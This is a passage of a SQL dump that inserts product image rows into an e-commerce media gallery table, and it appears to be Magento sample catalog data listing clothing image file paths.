(975, 90, '/m/s/ms10-red_main_1.jpg', 'image', 0),
(976, 90, '/m/s/ms10-black_main_1.jpg', 'image', 0),
(977, 90, '/m/s/ms10-blue_main_1.jpg', 'image', 0),
(978, 90, '/m/s/ms10-blue_alt1_1.jpg', 'image', 0),
(979, 90, '/m/s/ms10-blue_back_1.jpg', 'image', 0),
(980, 90, '/m/s/ms10-red_main_1.jpg', 'image', 0),
(981, 90, '/m/s/ms10-black_main_1.jpg', 'image', 0),
(982, 90, '/m/s/ms10-blue_main_1.jpg', 'image', 0),
(983, 90, '/m/s/ms10-blue_alt1_1.jpg', 'image', 0),
(984, 90, '/m/s/ms10-blue_back_1.jpg', 'image', 0),
(985, 90, '/m/s/ms10-red_main_1.jpg', 'image', 0),
(986, 90, '/m/s/ms10-black_main_1.jpg', 'image', 0),
(987, 90, '/m/s/ms10-blue_main_1.jpg', 'image', 0),
(988, 90, '/m/s/ms10-blue_alt1_1.jpg', 'image', 0),
(989, 90, '/m/s/ms10-blue_back_1.jpg', 'image', 0),
(990, 90, '/m/s/ms10-red_main_1.jpg', 'image', 0),
(991, 90, '/m/s/ms10-blue_main_1.jpg', 'image', 0),
(992, 90, '/m/s/ms10-blue_alt1_1.jpg', 'image', 0),
(993, 90, '/m/s/ms10-blue_back_1.jpg', 'image', 0),
(994, 90, '/m/s/ms07-black_main_1.jpg', 'image', 0),
(995, 90, '/m/s/ms07-green_main_1.jpg', 'image', 0),
(996, 90, '/m/s/ms07-green_alt1_1.jpg', 'image', 0);
INSERT INTO `catalog_product_entity_media_gallery` (`value_id`, `attribute_id`, `value`, `media_type`, `disabled`) VALUES
(997, 90, '/m/s/ms07-green_back_1.jpg', 'image', 0),
(998, 90, '/m/s/ms07-white_main_1.jpg', 'image', 0),
(999, 90, '/m/s/ms07-black_main_1.jpg', 'image', 0),
(1000, 90, '/m/s/ms07-green_main_1.jpg', 'image', 0),
(1001, 90, '/m/s/ms07-green_alt1_1.jpg', 'image', 0),
(1002, 90, '/m/s/ms07-green_back_1.jpg', 'image', 0),
(1003, 90, '/m/s/ms07-white_main_1.jpg', 'image', 0),
(1004, 90, '/m/s/ms07-black_main_1.jpg', 'image', 0),
(1005, 90, '/m/s/ms07-green_main_1.jpg', 'image', 0),
(1006, 90, '/m/s/ms07-green_alt1_1.jpg', 'image', 0),
(1007, 90, '/m/s/ms07-green_back_1.jpg', 'image', 0),
(1008, 90, '/m/s/ms07-white_main_1.jpg', 'image', 0),
(1009, 90, '/m/s/ms07-black_main_1.jpg', 'image', 0),
(1010, 90, '/m/s/ms07-green_main_1.jpg', 'image', 0),
(1011, 90, '/m/s/ms07-green_alt1_1.jpg', 'image', 0),
(1012, 90, '/m/s/ms07-green_back_1.jpg', 'image', 0),
(1013, 90, '/m/s/ms07-white_main_1.jpg', 'image', 0),
(1014, 90, '/m/s/ms07-black_main_1.jpg', 'image', 0),
(1015, 90, '/m/s/ms07-green_main_1.jpg', 'image', 0),
(1016, 90, '/m/s/ms07-green_alt1_1.jpg', 'image', 0),
(1017, 90, '/m/s/ms07-green_back_1.jpg', 'image', 0),
(1018, 90, '/m/s/ms07-white_main_1.jpg', 'image', 0),
(1019, 90, '/m/s/ms07-green_main_1.jpg', 'image', 0),
(1020, 90, '/m/s/ms07-green_alt1_1.jpg', 'image', 0),
(1021, 90, '/m/s/ms07-green_back_1.jpg', 'image', 0),
(1022, 90, '/m/s/ms08-black_main_1.jpg', 'image', 0),
(1023, 90, '/m/s/ms08-black_back_1.jpg', 'image', 0),
(1024, 90, '/m/s/ms08-blue_main_1.jpg', 'image', 0),
(1025, 90, '/m/s/ms08-red_main_1.jpg', 'image', 0),
(1026, 90, '/m/s/ms08-black_main_1.jpg', 'image', 0),
(1027, 90, '/m/s/ms08-black_back_1.jpg', 'image', 0),
(1028, 90, '/m/s/ms08-blue_main_1.jpg', 'image', 0),
(1029, 90, '/m/s/ms08-red_main_1.jpg', 'image', 0),
(1030, 90, '/m/s/ms08-black_main_1.jpg', 'image', 0),
(1031, 90, '/m/s/ms08-black_back_1.jpg', 'image', 0),
(1032, 90, '/m/s/ms08-blue_main_1.jpg', 'image', 0),
(1033, 90, '/m/s/ms08-red_main_1.jpg', 'image', 0),
(1034, 90, '/m/s/ms08-black_main_1.jpg', 'image', 0),
(1035, 90, '/m/s/ms08-black_back_1.jpg', 'image', 0),
(1036, 90, '/m/s/ms08-blue_main_1.jpg', 'image', 0),
(1037, 90, '/m/s/ms08-red_main_1.jpg', 'image', 0),
(1038, 90, '/m/s/ms08-black_main_1.jpg', 'image', 0),
(1039, 90, '/m/s/ms08-black_back_1.jpg', 'image', 0),
(1040, 90, '/m/s/ms08-blue_main_1.jpg', 'image', 0),
(1041, 90, '/m/s/ms08-red_main_1.jpg', 'image', 0),
(1042, 90, '/m/s/ms08-black_main_1.jpg', 'image', 0),
(1043, 90, '/m/s/ms08-black_back_1.jpg', 'image', 0),
(1044, 90, '/m/t/mt01-gray_main_1.jpg', 'image', 0),
(1045, 90, '/m/t/mt01-orange_main_1.jpg', 'image', 0),
(1046, 90, '/m/t/mt01-red_main_1.jpg', 'image', 0),
(1047, 90, '/m/t/mt01-red_alt1_1.jpg', 'image', 0),
(1048, 90, '/m/t/mt01-red_back_1.jpg', 'image', 0),
(1049, 90, '/m/t/mt01-gray_main_1.jpg', 'image', 0),
(1050, 90, '/m/t/mt01-orange_main_1.jpg', 'image', 0),
(1051, 90, '/m/t/mt01-red_main_1.jpg', 'image', 0),
(1052, 90, '/m/t/mt01-red_alt1_1.jpg', 'image', 0),
(1053, 90, '/m/t/mt01-red_back_1.jpg', 'image', 0),
(1054, 90, '/m/t/mt01-gray_main_1.jpg', 'image', 0),
(1055, 90, '/m/t/mt01-orange_main_1.jpg', 'image', 0),
(1056, 90, '/m/t/mt01-red_main_1.jpg', 'image', 0),
(1057, 90, '/m/t/mt01-red_alt1_1.jpg', 'image', 0),
(1058, 90, '/m/t/mt01-red_back_1.jpg', 'image', 0),
(1059, 90, '/m/t/mt01-gray_main_1.jpg', 'image', 0),
(1060, 90, '/m/t/mt01-orange_main_1.jpg', 'image', 0),
(1061, 90, '/m/t/mt01-red_main_1.jpg', 'image', 0),
(1062, 90, '/m/t/mt01-red_alt1_1.jpg', 'image', 0),
(1063, 90, '/m/t/mt01-red_back_1.jpg', 'image', 0),
(1064, 90, '/m/t/mt01-gray_main_1.jpg', 'image', 0),
(1065, 90, '/m/t/mt01-orange_main_1.jpg', 'image', 0),
(1066, 90, '/m/t/mt01-red_main_1.jpg', 'image', 0),
(1067, 90, '/m/t/mt01-red_alt1_1.jpg', 'image', 0),
(1068, 90, '/m/t/mt01-red_back_1.jpg', 'image', 0),
(1069, 90, '/m/t/mt01-red_main_1.jpg', 'image', 0),
(1070, 90, '/m/t/mt01-red_alt1_1.jpg', 'image', 0),
(1071, 90, '/m/t/mt01-red_back_1.jpg', 'image', 0),
(1072, 90, '/m/t/mt02-gray_main_1.jpg', 'image', 0),
(1073, 90, '/m/t/mt02-red_main_1.jpg', 'image', 0),
(1074, 90, '/m/t/mt02-white_main_1.jpg', 'image', 0),
(1075, 90, '/m/t/mt02-white_alt1_1.jpg', 'image', 0),
(1076, 90, '/m/t/mt02-white_back_1.jpg', 'image', 0),
(1077, 90, '/m/t/mt02-white_sideb_1.jpg', 'image', 0),
(1078, 90, '/m/t/mt02-gray_main_1.jpg', 'image', 0),
(1079, 90, '/m/t/mt02-red_main_1.jpg', 'image', 0),
(1080, 90, '/m/t/mt02-white_main_1.jpg', 'image', 0),
(1081, 90, '/m/t/mt02-white_alt1_1.jpg', 'image', 0),
(1082, 90, '/m/t/mt02-white_back_1.jpg', 'image', 0),
(1083, 90, '/m/t/mt02-white_sideb_1.jpg', 'image', 0),
(1084, 90, '/m/t/mt02-gray_main_1.jpg', 'image', 0),
(1085, 90, '/m/t/mt02-red_main_1.jpg', 'image', 0),
(1086, 90, '/m/t/mt02-white_main_2.jpg', 'image', 0),
(1087, 90, '/m/t/mt02-white_alt1_2.jpg', 'image', 0),
(1088, 90, '/m/t/mt02-white_back_2.jpg', 'image', 0),
(1089, 90, '/m/t/mt02-white_sideb_2.jpg', 'image', 0),
(1090, 90, '/m/t/mt02-gray_main_2.jpg', 'image', 0),
(1091, 90, '/m/t/mt02-red_main_2.jpg', 'image', 0),
(1092, 90, '/m/t/mt02-white_main_2.jpg', 'image', 0),
(1093, 90, '/m/t/mt02-white_alt1_2.jpg', 'image', 0),
(1094, 90, '/m/t/mt02-white_back_2.jpg', 'image', 0),
(1095, 90, '/m/t/mt02-white_sideb_2.jpg', 'image', 0),
(1096, 90, '/m/t/mt02-gray_main_2.jpg', 'image', 0),
(1097, 90, '/m/t/mt02-red_main_2.jpg', 'image', 0),
(1098, 90, '/m/t/mt02-white_main_2.jpg', 'image', 0),
(1099, 90, '/m/t/mt02-white_alt1_2.jpg', 'image', 0),
(1100, 90, '/m/t/mt02-white_back_2.jpg', 'image', 0),
(1101, 90, '/m/t/mt02-white_sideb_2.jpg', 'image', 0),
(1102, 90, '/m/t/mt02-white_main_2.jpg', 'image', 0),
(1103, 90, '/m/t/mt02-white_alt1_2.jpg', 'image', 0),
(1104, 90, '/m/t/mt02-white_back_2.jpg', 'image', 0),
(1105, 90, '/m/t/mt02-white_sideb_2.jpg', 'image', 0),
(1106, 90, '/m/t/mt03-blue_main_1.jpg', 'image', 0),
(1107, 90, '/m/t/mt03-red_main_1.jpg', 'image', 0),
(1108, 90, '/m/t/mt03-yellow_main_1.jpg', 'image', 0),
(1109, 90, '/m/t/mt03-blue_main_1.jpg', 'image', 0),
(1110, 90, '/m/t/mt03-red_main_1.jpg', 'image', 0),
(1111, 90, '/m/t/mt03-yellow_main_1.jpg', 'image', 0),
(1112, 90, '/m/t/mt03-blue_main_1.jpg', 'image', 0),
(1113, 90, '/m/t/mt03-red_main_1.jpg', 'image', 0),
(1114, 90, '/m/t/mt03-yellow_main_1.jpg', 'image', 0),
(1115, 90, '/m/t/mt03-blue_main_1.jpg', 'image', 0),
(1116, 90, '/m/t/mt03-red_main_1.jpg', 'image', 0),
(1117, 90, '/m/t/mt03-yellow_main_1.jpg', 'image', 0),
(1118, 90, '/m/t/mt03-blue_main_1.jpg', 'image', 0),
(1119, 90, '/m/t/mt03-red_main_1.jpg', 'image', 0),
(1120, 90, '/m/t/mt03-yellow_main_1.jpg', 'image', 0),
(1121, 90, '/m/t/mt03-red_main_1.jpg', 'image', 0),
(1122, 90, '/m/t/mt04-blue_main_1.jpg', 'image', 0),
(1123, 90, '/m/t/mt04-blue_alt1_1.jpg', 'image', 0),
(1124, 90, '/m/t/mt04-blue_back_1.jpg', 'image', 0),
(1125, 90, '/m/t/mt04-blue_main_1.jpg', 'image', 0),
(1126, 90, '/m/t/mt04-blue_alt1_1.jpg', 'image', 0),
(1127, 90, '/m/t/mt04-blue_back_1.jpg', 'image', 0),
(1128, 90, '/m/t/mt04-blue_main_1.jpg', 'image', 0),
(1129, 90, '/m/t/mt04-blue_alt1_1.jpg', 'image', 0),
(1130, 90, '/m/t/mt04-blue_back_1.jpg', 'image', 0),
(1131, 90, '/m/t/mt04-blue_main_1.jpg', 'image', 0),
(1132, 90, '/m/t/mt04-blue_alt1_1.jpg', 'image', 0),
(1133, 90, '/m/t/mt04-blue_back_1.jpg', 'image', 0),
(1134, 90, '/m/t/mt04-blue_main_1.jpg', 'image', 0),
(1135, 90, '/m/t/mt04-blue_alt1_1.jpg', 'image', 0),
(1136, 90, '/m/t/mt04-blue_back_1.jpg', 'image', 0),
(1137, 90, '/m/t/mt04-blue_main_1.jpg', 'image', 0),
(1138, 90, '/m/t/mt04-blue_alt1_1.jpg', 'image', 0),
(1139, 90, '/m/t/mt04-blue_back_1.jpg', 'image', 0),
(1140, 90, '/m/t/mt05-blue_main_1.jpg', 'image', 0),
(1141, 90, '/m/t/mt05-blue_back_1.jpg', 'image', 0),
(1142, 90, '/m/t/mt05-blue_main_1.jpg', 'image', 0),
(1143, 90, '/m/t/mt05-blue_back_1.jpg', 'image', 0),
(1144, 90, '/m/t/mt05-blue_main_1.jpg', 'image', 0),
(1145, 90, '/m/t/mt05-blue_back_1.jpg', 'image', 0),
(1146, 90, '/m/t/mt05-blue_main_1.jpg', 'image', 0),
(1147, 90, '/m/t/mt05-blue_back_1.jpg', 'image', 0),
(1148, 90, '/m/t/mt05-blue_main_1.jpg', 'image', 0),
(1149, 90, '/m/t/mt05-blue_back_1.jpg', 'image', 0),
(1150, 90, '/m/t/mt05-blue_main_1.jpg', 'image', 0),
(1151, 90, '/m/t/mt05-blue_back_1.jpg', 'image', 0),
(1152, 90, '/m/t/mt06-black_main_1.jpg', 'image', 0),
(1153, 90, '/m/t/mt06-black_back_1.jpg', 'image', 0),
(1154, 90, '/m/t/mt06-black_main_1.jpg', 'image', 0),
(1155, 90, '/m/t/mt06-black_back_1.jpg', 'image', 0),
(1156, 90, '/m/t/mt06-black_main_1.jpg', 'image', 0),
(1157, 90, '/m/t/mt06-black_back_1.jpg', 'image', 0),
(1158, 90, '/m/t/mt06-black_main_1.jpg', 'image', 0),
(1159, 90, '/m/t/mt06-black_back_1.jpg', 'image', 0),
(1160, 90, '/m/t/mt06-black_main_1.jpg', 'image', 0),
(1161, 90, '/m/t/mt06-black_back_1.jpg', 'image', 0),
(1162, 90, '/m/t/mt06-black_main_1.jpg', 'image', 0),
(1163, 90, '/m/t/mt06-black_back_1.jpg', 'image', 0),
(1164, 90, '/m/t/mt07-gray_main_1.jpg', 'image', 0),
(1165, 90, '/m/t/mt07-gray_back_1.jpg', 'image', 0),
(1166, 90, '/m/t/mt07-gray_main_1.jpg', 'image', 0),
(1167, 90, '/m/t/mt07-gray_back_1.jpg', 'image', 0),
(1168, 90, '/m/t/mt07-gray_main_1.jpg', 'image', 0),
(1169, 90, '/m/t/mt07-gray_back_1.jpg', 'image', 0),
(1170, 90, '/m/t/mt07-gray_main_1.jpg', 'image', 0),
(1171, 90, '/m/t/mt07-gray_back_1.jpg', 'image', 0),
(1172, 90, '/m/t/mt07-gray_main_1.jpg', 'image', 0),
(1173, 90, '/m/t/mt07-gray_back_1.jpg', 'image', 0),
(1174, 90, '/m/t/mt07-gray_main_1.jpg', 'image', 0),
(1175, 90, '/m/t/mt07-gray_back_1.jpg', 'image', 0),
(1176, 90, '/m/t/mt08-green_main_1.jpg', 'image', 0),
(1177, 90, '/m/t/mt08-green_alt1_1.jpg', 'image', 0),
(1178, 90, '/m/t/mt08-green_back_1.jpg', 'image', 0),
(1179, 90, '/m/t/mt08-green_main_1.jpg', 'image', 0),
(1180, 90, '/m/t/mt08-green_alt1_1.jpg', 'image', 0),
(1181, 90, '/m/t/mt08-green_back_1.jpg', 'image', 0),
(1182, 90, '/m/t/mt08-green_main_1.jpg', 'image', 0),
(1183, 90, '/m/t/mt08-green_alt1_1.jpg', 'image', 0),
(1184, 90, '/m/t/mt08-green_back_1.jpg', 'image', 0),
(1185, 90, '/m/t/mt08-green_main_1.jpg', 'image', 0),
(1186, 90, '/m/t/mt08-green_alt1_1.jpg', 'image', 0),
(1187, 90, '/m/t/mt08-green_back_1.jpg', 'image', 0),
(1188, 90, '/m/t/mt08-green_main_1.jpg', 'image', 0),
(1189, 90, '/m/t/mt08-green_alt1_1.jpg', 'image', 0),
(1190, 90, '/m/t/mt08-green_back_1.jpg', 'image', 0),
(1191, 90, '/m/t/mt08-green_main_1.jpg', 'image', 0),
(1192, 90, '/m/t/mt08-green_alt1_1.jpg', 'image', 0),
(1193, 90, '/m/t/mt08-green_back_1.jpg', 'image', 0),
(1194, 90, '/m/t/mt09-blue_main_1.jpg', 'image', 0),
(1195, 90, '/m/t/mt09-blue_alt1_1.jpg', 'image', 0),
(1196, 90, '/m/t/mt09-blue_back_1.jpg', 'image', 0),
(1197, 90, '/m/t/mt09-blue_main_1.jpg', 'image', 0),
(1198, 90, '/m/t/mt09-blue_alt1_1.jpg', 'image', 0),
(1199, 90, '/m/t/mt09-blue_back_1.jpg', 'image', 0),
(1200, 90, '/m/t/mt09-blue_main_1.jpg', 'image', 0),
(1201, 90, '/m/t/mt09-blue_alt1_1.jpg', 'image', 0),
(1202, 90, '/m/t/mt09-blue_back_1.jpg', 'image', 0),
(1203, 90, '/m/t/mt09-blue_main_1.jpg', 'image', 0),
(1204, 90, '/m/t/mt09-blue_alt1_1.jpg', 'image', 0),
(1205, 90, '/m/t/mt09-blue_back_1.jpg', 'image', 0),
(1206, 90, '/m/t/mt09-blue_main_1.jpg', 'image', 0),
(1207, 90, '/m/t/mt09-blue_alt1_1.jpg', 'image', 0),
(1208, 90, '/m/t/mt09-blue_back_1.jpg', 'image', 0),
(1209, 90, '/m/t/mt09-blue_main_1.jpg', 'image', 0),
(1210, 90, '/m/t/mt09-blue_alt1_1.jpg', 'image', 0),
(1211, 90, '/m/t/mt09-blue_back_1.jpg', 'image', 0),
(1212, 90, '/m/t/mt10-yellow_main_1.jpg', 'image', 0),
(1213, 90, '/m/t/mt10-yellow_back_1.jpg', 'image', 0),
(1214, 90, '/m/t/mt10-yellow_main_1.jpg', 'image', 0),
(1215, 90, '/m/t/mt10-yellow_back_1.jpg', 'image', 0),
(1216, 90, '/m/t/mt10-yellow_main_1.jpg', 'image', 0),
(1217, 90, '/m/t/mt10-yellow_back_1.jpg', 'image', 0),
(1218, 90, '/m/t/mt10-yellow_main_1.jpg', 'image', 0),
(1219, 90, '/m/t/mt10-yellow_back_1.jpg', 'image', 0),
(1220, 90, '/m/t/mt10-yellow_main_1.jpg', 'image', 0),
(1221, 90, '/m/t/mt10-yellow_back_1.jpg', 'image', 0),
(1222, 90, '/m/t/mt10-yellow_main_1.jpg', 'image', 0),
(1223, 90, '/m/t/mt10-yellow_back_1.jpg', 'image', 0),
(1224, 90, '/m/t/mt11-blue_main_1.jpg', 'image', 0),
(1225, 90, '/m/t/mt11-blue_back_1.jpg', 'image', 0),
(1226, 90, '/m/t/mt11-blue_main_1.jpg', 'image', 0),
(1227, 90, '/m/t/mt11-blue_back_1.jpg', 'image', 0),
(1228, 90, '/m/t/mt11-blue_main_1.jpg', 'image', 0),
(1229, 90, '/m/t/mt11-blue_back_1.jpg', 'image', 0),
(1230, 90, '/m/t/mt11-blue_main_1.jpg', 'image', 0),
(1231, 90, '/m/t/mt11-blue_back_1.jpg', 'image', 0),
(1232, 90, '/m/t/mt11-blue_main_1.jpg', 'image', 0),
(1233, 90, '/m/t/mt11-blue_back_1.jpg', 'image', 0),
(1234, 90, '/m/t/mt11-blue_main_1.jpg', 'image', 0),
(1235, 90, '/m/t/mt11-blue_back_1.jpg', 'image', 0),
(1236, 90, '/m/t/mt12-blue_main_1.jpg', 'image', 0),
(1237, 90, '/m/t/mt12-blue_back_1.jpg', 'image', 0),
(1238, 90, '/m/t/mt12-blue_main_1.jpg', 'image', 0),
(1239, 90, '/m/t/mt12-blue_back_1.jpg', 'image', 0),
(1240, 90, '/m/t/mt12-blue_main_1.jpg', 'image', 0),
(1241, 90, '/m/t/mt12-blue_back_1.jpg', 'image', 0),
(1242, 90, '/m/t/mt12-blue_main_1.jpg', 'image', 0),
(1243, 90, '/m/t/mt12-blue_back_1.jpg', 'image', 0),
(1244, 90, '/m/t/mt12-blue_main_1.jpg', 'image', 0),
(1245, 90, '/m/t/mt12-blue_back_1.jpg', 'image', 0),
(1246, 90, '/m/t/mt12-blue_main_1.jpg', 'image', 0),
(1247, 90, '/m/t/mt12-blue_back_1.jpg', 'image', 0),
(1248, 90, '/m/p/mp01-black_main_1.jpg', 'image', 0),
(1249, 90, '/m/p/mp01-gray_main_1.jpg', 'image', 0),
(1250, 90, '/m/p/mp01-gray_back_1.jpg', 'image', 0),
(1251, 90, '/m/p/mp01-purple_main_1.jpg', 'image', 0),
(1252, 90, '/m/p/mp01-black_main_1.jpg', 'image', 0),
(1253, 90, '/m/p/mp01-gray_main_1.jpg', 'image', 0),
(1254, 90, '/m/p/mp01-gray_back_1.jpg', 'image', 0),
(1255, 90, '/m/p/mp01-purple_main_1.jpg', 'image', 0),
(1256, 90, '/m/p/mp01-black_main_1.jpg', 'image', 0),
(1257, 90, '/m/p/mp01-gray_main_1.jpg', 'image', 0),
(1258, 90, '/m/p/mp01-gray_back_1.jpg', 'image', 0),
(1259, 90, '/m/p/mp01-purple_main_1.jpg', 'image', 0),
(1260, 90, '/m/p/mp01-black_main_1.jpg', 'image', 0),
(1261, 90, '/m/p/mp01-gray_main_1.jpg', 'image', 0),
(1262, 90, '/m/p/mp01-gray_back_1.jpg', 'image', 0),
(1263, 90, '/m/p/mp01-purple_main_1.jpg', 'image', 0),
(1264, 90, '/m/p/mp01-gray_main_1.jpg', 'image', 0),
(1265, 90, '/m/p/mp01-gray_back_1.jpg', 'image', 0),
(1266, 90, '/m/p/mp02-blue_main_1.jpg', 'image', 0),
(1267, 90, '/m/p/mp02-gray_main_1.jpg', 'image', 0),
(1268, 90, '/m/p/mp02-gray_back_1.jpg', 'image', 0),
(1269, 90, '/m/p/mp02-red_main_1.jpg', 'image', 0),
(1270, 90, '/m/p/mp02-blue_main_1.jpg', 'image', 0),
(1271, 90, '/m/p/mp02-gray_main_1.jpg', 'image', 0),
(1272, 90, '/m/p/mp02-gray_back_1.jpg', 'image', 0),
(1273, 90, '/m/p/mp02-red_main_1.jpg', 'image', 0),
(1274, 90, '/m/p/mp02-blue_main_1.jpg', 'image', 0),
(1275, 90, '/m/p/mp02-gray_main_1.jpg', 'image', 0),
(1276, 90, '/m/p/mp02-gray_back_1.jpg', 'image', 0),
(1277, 90, '/m/p/mp02-red_main_1.jpg', 'image', 0),
(1278, 90, '/m/p/mp02-blue_main_2.jpg', 'image', 0),
(1279, 90, '/m/p/mp02-gray_main_2.jpg', 'image', 0),
(1280, 90, '/m/p/mp02-gray_back_2.jpg', 'image', 0),
(1281, 90, '/m/p/mp02-red_main_2.jpg', 'image', 0),
(1282, 90, '/m/p/mp02-gray_main_2.jpg', 'image', 0),
(1283, 90, '/m/p/mp02-gray_back_2.jpg', 'image', 0),
(1284, 90, '/m/p/mp03-blue_main_1.jpg', 'image', 0),
(1285, 90, '/m/p/mp03-green_main_1.jpg', 'image', 0),
(1286, 90, '/m/p/mp03-red_main_1.jpg', 'image', 0),
(1287, 90, '/m/p/mp03-blue_main_1.jpg', 'image', 0),
(1288, 90, '/m/p/mp03-green_main_1.jpg', 'image', 0),
(1289, 90, '/m/p/mp03-red_main_1.jpg', 'image', 0),
(1290, 90, '/m/p/mp03-blue_main_1.jpg', 'image', 0),
(1291, 90, '/m/p/mp03-green_main_1.jpg', 'image', 0),
(1292, 90, '/m/p/mp03-red_main_1.jpg', 'image', 0),
(1293, 90, '/m/p/mp03-blue_main_1.jpg', 'image', 0),
(1294, 90, '/m/p/mp03-green_main_1.jpg', 'image', 0),
(1295, 90, '/m/p/mp03-red_main_1.jpg', 'image', 0),
(1296, 90, '/m/p/mp03-black_main_1.jpg', 'image', 0),
(1297, 90, '/m/p/mp03-black_alt1_1.jpg', 'image', 0),
(1298, 90, '/m/p/mp03-black_back_1.jpg', 'image', 0),
(1299, 90, '/m/p/mp04-black_main_1.jpg', 'image', 0),
(1300, 90, '/m/p/mp04-gray_main_1.jpg', 'image', 0),
(1301, 90, '/m/p/mp04-gray_back_1.jpg', 'image', 0),
(1302, 90, '/m/p/mp04-green_main_1.jpg', 'image', 0),
(1303, 90, '/m/p/mp04-black_main_1.jpg', 'image', 0),
(1304, 90, '/m/p/mp04-gray_main_1.jpg', 'image', 0),
(1305, 90, '/m/p/mp04-gray_back_1.jpg', 'image', 0),
(1306, 90, '/m/p/mp04-green_main_1.jpg', 'image', 0),
(1307, 90, '/m/p/mp04-black_main_1.jpg', 'image', 0),
(1308, 90, '/m/p/mp04-gray_main_1.jpg', 'image', 0),
(1309, 90, '/m/p/mp04-gray_back_1.jpg', 'image', 0),
(1310, 90, '/m/p/mp04-green_main_1.jpg', 'image', 0),
(1311, 90, '/m/p/mp04-black_main_1.jpg', 'image', 0),
(1312, 90, '/m/p/mp04-gray_main_1.jpg', 'image', 0),
(1313, 90, '/m/p/mp04-gray_back_1.jpg', 'image', 0),
(1314, 90, '/m/p/mp04-green_main_1.jpg', 'image', 0),
(1315, 90, '/m/p/mp04-gray_main_1.jpg', 'image', 0),
(1316, 90, '/m/p/mp04-gray_back_1.jpg', 'image', 0),
(1317, 90, '/m/p/mp05-black_main_1.jpg', 'image', 0),
(1318, 90, '/m/p/mp05-blue_main_1.jpg', 'image', 0),
(1319, 90, '/m/p/mp05-blue_back_1.jpg', 'image', 0),
(1320, 90, '/m/p/mp05-blue_outfit_1.jpg', 'image', 0),
(1321, 90, '/m/p/mp05-green_main_1.jpg', 'image', 0),
(1322, 90, '/m/p/mp05-black_main_1.jpg', 'image', 0),
(1323, 90, '/m/p/mp05-blue_main_1.jpg', 'image', 0),
(1324, 90, '/m/p/mp05-blue_back_1.jpg', 'image', 0),
(1325, 90, '/m/p/mp05-blue_outfit_1.jpg', 'image', 0),
(1326, 90, '/m/p/mp05-green_main_1.jpg', 'image', 0),
(1327, 90, '/m/p/mp05-black_main_1.jpg', 'image', 0),
(1328, 90, '/m/p/mp05-blue_main_1.jpg', 'image', 0),
(1329, 90, '/m/p/mp05-blue_back_1.jpg', 'image', 0),
(1330, 90, '/m/p/mp05-blue_outfit_1.jpg', 'image', 0),
(1331, 90, '/m/p/mp05-green_main_1.jpg', 'image', 0),
(1332, 90, '/m/p/mp05-black_main_1.jpg', 'image', 0),
(1333, 90, '/m/p/mp05-blue_main_1.jpg', 'image', 0),
(1334, 90, '/m/p/mp05-blue_back_1.jpg', 'image', 0),
(1335, 90, '/m/p/mp05-blue_outfit_1.jpg', 'image', 0),
(1336, 90, '/m/p/mp05-green_main_1.jpg', 'image', 0),
(1337, 90, '/m/p/mp05-blue_main_1.jpg', 'image', 0),
(1338, 90, '/m/p/mp05-blue_back_1.jpg', 'image', 0),
(1339, 90, '/m/p/mp05-blue_outfit_1.jpg', 'image', 0),
(1340, 90, '/m/p/mp06-gray_main_1.jpg', 'image', 0),
(1341, 90, '/m/p/mp06-gray_back_1.jpg', 'image', 0),
(1342, 90, '/m/p/mp06-gray_outfit_1.jpg', 'image', 0),
(1343, 90, '/m/p/mp06-green_main_1.jpg', 'image', 0),
(1344, 90, '/m/p/mp06-orange_main_1.jpg', 'image', 0),
(1345, 90, '/m/p/mp06-gray_main_1.jpg', 'image', 0),
(1346, 90, '/m/p/mp06-gray_back_1.jpg', 'image', 0),
(1347, 90, '/m/p/mp06-gray_outfit_1.jpg', 'image', 0),
(1348, 90, '/m/p/mp06-green_main_1.jpg', 'image', 0),
(1349, 90, '/m/p/mp06-orange_main_1.jpg', 'image', 0),
(1350, 90, '/m/p/mp06-gray_main_1.jpg', 'image', 0),
(1351, 90, '/m/p/mp06-gray_back_1.jpg', 'image', 0),
(1352, 90, '/m/p/mp06-gray_outfit_1.jpg', 'image', 0),
(1353, 90, '/m/p/mp06-green_main_1.jpg', 'image', 0),
(1354, 90, '/m/p/mp06-orange_main_1.jpg', 'image', 0),
(1355, 90, '/m/p/mp06-gray_main_1.jpg', 'image', 0),
(1356, 90, '/m/p/mp06-gray_back_1.jpg', 'image', 0),
(1357, 90, '/m/p/mp06-gray_outfit_1.jpg', 'image', 0),
(1358, 90, '/m/p/mp06-green_main_1.jpg', 'image', 0),
(1359, 90, '/m/p/mp06-orange_main_1.jpg', 'image', 0),
(1360, 90, '/m/p/mp06-gray_main_1.jpg', 'image', 0),
(1361, 90, '/m/p/mp06-gray_back_1.jpg', 'image', 0),
(1362, 90, '/m/p/mp06-gray_outfit_1.jpg', 'image', 0),
(1363, 90, '/m/p/mp07-black_main_1.jpg', 'image', 0),
(1364, 90, '/m/p/mp07-blue_main_1.jpg', 'image', 0),
(1365, 90, '/m/p/mp07-blue_alt1_1.jpg', 'image', 0),
(1366, 90, '/m/p/mp07-blue_back_1.jpg', 'image', 0),
(1367, 90, '/m/p/mp07-blue_side_a_1.jpg', 'image', 0),
(1368, 90, '/m/p/mp07-blue_side_b_1.jpg', 'image', 0),
(1369, 90, '/m/p/mp07-purple_main_1.jpg', 'image', 0),
(1370, 90, '/m/p/mp07-black_main_1.jpg', 'image', 0),
(1371, 90, '/m/p/mp07-blue_main_1.jpg', 'image', 0),
(1372, 90, '/m/p/mp07-blue_alt1_1.jpg', 'image', 0),
(1373, 90, '/m/p/mp07-blue_back_1.jpg', 'image', 0),
(1374, 90, '/m/p/mp07-blue_side_a_1.jpg', 'image', 0),
(1375, 90, '/m/p/mp07-blue_side_b_1.jpg', 'image', 0),
(1376, 90, '/m/p/mp07-purple_main_1.jpg', 'image', 0),
(1377, 90, '/m/p/mp07-black_main_1.jpg', 'image', 0),
(1378, 90, '/m/p/mp07-blue_main_1.jpg', 'image', 0),
(1379, 90, '/m/p/mp07-blue_alt1_1.jpg', 'image', 0),
(1380, 90, '/m/p/mp07-blue_back_1.jpg', 'image', 0),
(1381, 90, '/m/p/mp07-blue_side_a_1.jpg', 'image', 0),
(1382, 90, '/m/p/mp07-blue_side_b_1.jpg', 'image', 0),
(1383, 90, '/m/p/mp07-purple_main_1.jpg', 'image', 0),
(1384, 90, '/m/p/mp07-black_main_1.jpg', 'image', 0),
(1385, 90, '/m/p/mp07-blue_main_1.jpg', 'image', 0),
(1386, 90, '/m/p/mp07-blue_alt1_1.jpg', 'image', 0),
(1387, 90, '/m/p/mp07-blue_back_1.jpg', 'image', 0),
(1388, 90, '/m/p/mp07-blue_side_a_1.jpg', 'image', 0),
(1389, 90, '/m/p/mp07-blue_side_b_1.jpg', 'image', 0),
(1390, 90, '/m/p/mp07-purple_main_1.jpg', 'image', 0),
